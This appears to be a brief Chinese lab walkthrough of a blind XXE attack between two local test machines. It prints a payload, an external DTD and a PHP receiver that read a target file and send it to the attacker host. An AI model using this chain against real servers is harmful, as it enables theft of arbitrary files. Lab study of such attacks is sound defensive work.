XXE平台:192.168.5.108
攻击机:192.168.5.160
前提:本次实验两台主机都使用的phpstudy搭建环境,XXE平台主机可以访问到攻击机
输入账号密码,使用BP随机抓取一组数据包
Payload:
<?xml version="1.0"?>
<!DOCTYPE aa [
<!ENTITY % file SYSTEM "file:///d:/1.txt">
<!ENTITY % aa SYSTEM "http://192.168.5.160/a.dtd" >
%aa;
%ss;
]>
a.dtd
<!ENTITY % ss "<!ENTITY send SYSTEM 'http://192.168.5.160/get.php?file=%file;'>">
get.php
<?php
$file = $_GET['file'];
$myfile = fopen("c://file.txt", "w+"); //写入到本机
fwrite($myfile, $file); //将file中的内容写入到本机c盘file文件中
fclose($myfile);
?>
攻击机目录
这样我们可以读取到目标主机的任意文件写入到c://file.txt中
这样我们就写入到文件中了。